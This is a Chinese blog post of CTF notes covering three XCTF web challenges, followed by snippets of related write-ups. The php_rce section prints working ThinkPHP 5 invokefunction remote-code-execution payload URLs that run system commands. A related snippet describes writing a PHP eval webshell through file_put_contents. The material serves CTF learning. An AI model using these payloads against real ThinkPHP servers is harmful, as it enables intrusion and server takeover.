CTF做题笔记2

原创已于 2022-01-27 15:24:26 修改 · 190 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全

于 2021-12-02 22:18:16 首次发布

本文详细介绍了攻防世界Web进阶区的三道挑战题解，包括baby_web、Training-WWW-Robots和php_rce。在baby_web中，通过使用Burpsuite工具，将1.php修改为index.php，成功获取flag。在Training-WWW-Robots题目中，遵循robots.txt的提示，访问fl0g.php找到flag。在php_rce挑战中，利用ThinkPHP的远程代码执行漏洞，构造payload执行系统命令，最终找到并展示flag。

攻防世界Web进阶区题解

第一题:baby_web

题目:想想初始页面是哪个

解答：用Burpsuite拦截数据包，Send to Repeater后将1.php修改为index.php，发送

请添加图片描述

在Response返回头中得到flag

请添加图片描述

第二题：Training-WWW-Robots

题目：暂无

解答：启动场景，发现如下提示

请添加图片描述

访问robots.txt中的内容

请添加图片描述

继续访问fl0g.php，获得flag

请添加图片描述

第三题：php_rce

题目：暂无

解答：启动场景，发现如下提示

请添加图片描述

发现这是ThinkPHP远程代码执行漏洞，去搜索相关漏洞信息

请添加图片描述

payload

请添加图片描述

http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

远程控制代码执行

查询flag

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name flag

请添加图片描述

获取flag

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

请添加图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

N1etzsche

关注关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【网络安全 | CTF】攻防世界 php_rce 解题详析

等风来

05-22

8120

PHP RCE 指的是通过远程代码执行漏洞（Remote Code Execution）来攻击 PHP 程序的一种方式。简单来说，由于PHP应用程序没有正确处理外部输入数据（如用户提交的表单、请求参数等），此时通过某些手段向 PHP 应用程序中注入恶意代码，然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知，flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试，根据提示，使用5.0.20版本的Payload。说明命令执行成功，接着抓取flag即可。

ctf攻防世界 WEB题:php_rce

qq_30889301的博客

05-09

1193

ThinkPHP是一个基于PHP语言的开源Web应用框架，它提供了一系列的工具和组件，可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点，被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具：https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容，非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例，我们只需要更改就可以了。

参与评论您还未登录，请先登录后发表或查看评论

2024.12.6——攻防世界php_rce

2402_87387800的博客

12-08

1538

攻防世界-php_rce - -ro0t - 博客园分为远程命令执行ping以及远程代码执行evel。漏洞出现的原因是没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。

攻防世界-web篇(php_rce)详解

qq_54803507的博客

09-25

3748

web篇(php_rce)详解

php_rce(攻防世界）

m0_70819573的博客

02-20

371

2.关于thinkphp的框架漏洞，可以参考。1.打开主页，提示了thinkphp版本较低。poc和exp有一大堆。

胡乱自学黑客的，能骂醒一个算一个

2401_84208172的博客

05-05

1274

为啥说胡乱自学黑客的，能骂醒一个算一个。因为很多人学会个工具就觉得自己是黑客了，其实再真正的黑客眼里，你就是个脚本小子而已。首先我谈下对黑客&网络安全的认知，其实最重要的是兴趣热爱，不同于网络安全工程师，他们大都是培训机构培训出来的，具备的基本都是防御和白帽子技能，他们绝大多数的人看的是工资，他们是为了就业而学习，为了走捷径才去参加培训。

CTF Web学习笔记

01-11

### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术，这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中，经常出现的情况是将flag隐藏在图像、音频...

CTF解题思路笔记

山兔的博客

09-13

2986

1.直接查看网页源码，即可找到 flag。 2.robots.txt 3.查看http请求/响应。 4.302跳转的中转网页有信息。 5.查看开发者工具控制台。 6.javascript代码绕过。 7..bash_history。 8.Webshell： 9.ctf之流量分析：Referer来源伪造； 10.X-Forwarded-For：ip 伪造。 11.User-Agent：用户代理（就是用什么浏览器什么的）。 12.web源码泄漏： vim源码泄漏，如果发现页面上有提示 vi 或vim，说明存在s

CTF做题笔记13

Forever_Han13的博客

05-01

420

CISCN2019 华北赛区 Day1 Web1 Dropbox  <?php class User { public $db; } class File{ public $filename; } class FileList{ private $files; public function __construct($path) { $file = new File(); $file-&gt

CTF做题笔记4

Forever_Han13的博客

12-11

3050

第五题：ics-06 题目：云平台报表中心收集了设备管理基础服务的数据，但是数据被删除了，只有一处留下了入侵者的痕迹。解答：启动场景，获得信息发现只有左侧报表中心可以点击，看见地址中含有id=1,可以尝试用爆破用crunch工具生成字典 crunch 1 5 0123456789 >> pass_4.txt 查看字典 more pass_1.txt 运用BurpSuite加载字典进行爆破，发现id=2333响应长度不一样获得flag [外链图片转存失败,源站可能有防盗

CTF Show MISC做题笔记

lakeside1的博客

06-08

1067

ctf show MISC的做题笔记

php_rce-攻防世界

szhangliwenya的博客

03-26

1849

该漏洞是由于ThinkPHP5在处理控制器传参时，没有对参数进行充分的过滤与验证，导致恶意用户可以通过提交恶意数据，构造出一个带有PHP函数的控制器方法，并通过URL参数的形式访问该方法，从而触发远程代码执行漏洞。远程命令/代码执行漏洞，简称RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。参数通常用于指定ThinkPHP框架中的模块/控制器/方法。服务器没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令。查看 flag目录下的文件。

攻防世界——php_rce

weixin_73942557的博客

10-16

325

在网上查找这个东西，发现有远程命令执行漏洞。利用已经构造好的payload直接上。看到了flag查看路径获取它。攻防世界——php_rce。使用whereis命令查找。

【攻防世界】php_rce （ThinkPHP5）

2302_79800344的博客

04-09

1138

【代码】【攻防世界】php_rce （ThinkPHP5漏洞）

攻防世界新手题——php_rce

qq_62248023的博客

10-29

2188

（4）&vars[0]=file_put_contents，call_user_func_array 的第一个参数（即回调函数）是 file_put_contents。（6）&vars[1][]=%3C%3fphp+eval(%24_POST[%27123%27])%3b%3f%3E，这里指定的是 file_put_contents函数的第二个参数，即要写入文件的内容。（5）&vars[1][]=123.php，call_user_func_array 的第二个参数是一个数组。1、什么是php rce?

【攻防世界】三 --- php_rce

qq_43168364的博客

12-23

551

题目 — php_rce 一、writeup 主页中提示使用了ThinkPHP V5 在github中搜一下ThinkPHP V5的相关漏洞，可以找到一些由于我们不知其具体的版本，随便找一个执行一下，这里选择第一个会显出了root 说明thinkphp的版本可能就是：5.0.22，在选择下面的命令执行paylaod执行可以执行命令执行find命令查找flag相关文件可以在根目录下找到flag文件使用cat命令可以看到flag 二、知识点 Thinkphp5 的 5.0.22

攻防世界（进阶刷题)php_rce 以及ctf.show注入通关

qq_62046696的博客

06-01

1460

php_rce 这道题考察php远程漏洞问题打开界面一看，然后看师傅们的wp都是直接去，github去查Think PHP V5漏洞然后随便找了一个输了进去发现，提示我们要用5.02的版本漏洞 6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ...

php_rce(攻防世界lv.2)

qq_66013948的博客

10-25

515

可以看到当前目录内的文件，既然这样能够成功，那么我们就可以试着把退回根目录找有关flag的文件夹或者文件，最后在根目录上找的了个flag的文件夹，之后就是构造payload为。这是一道关于thinkphp5的一个典型的rce漏洞，可以去。里面看有关漏洞的分析，通常构造的payload为。可以看到flag了。

攻防世界_php_rce（ThinkPHP框架）

2401_87524087的博客

02-02

1192

常见攻击方式 Web应用漏洞利用：如PHP应用中，若对用户输入过滤不严格，攻击者可通过表单、URL参数等注入恶意命令，借助服务器执行命令的函数，像 system() 、 exec() 等实现远程命令执行。RCE指攻击者能通过网络远程控制目标系统，执行恶意命令，获取敏感信息、控制设备、传播恶意软件等，对系统安全和数据造成极大威胁。RCE（Remote Command Execution）远程命令执行，是一种严重的网络安全漏洞。点链接，发现是广告，没什么特别的，再看题目php.rce，查一下RCE是什么。

ctf笔记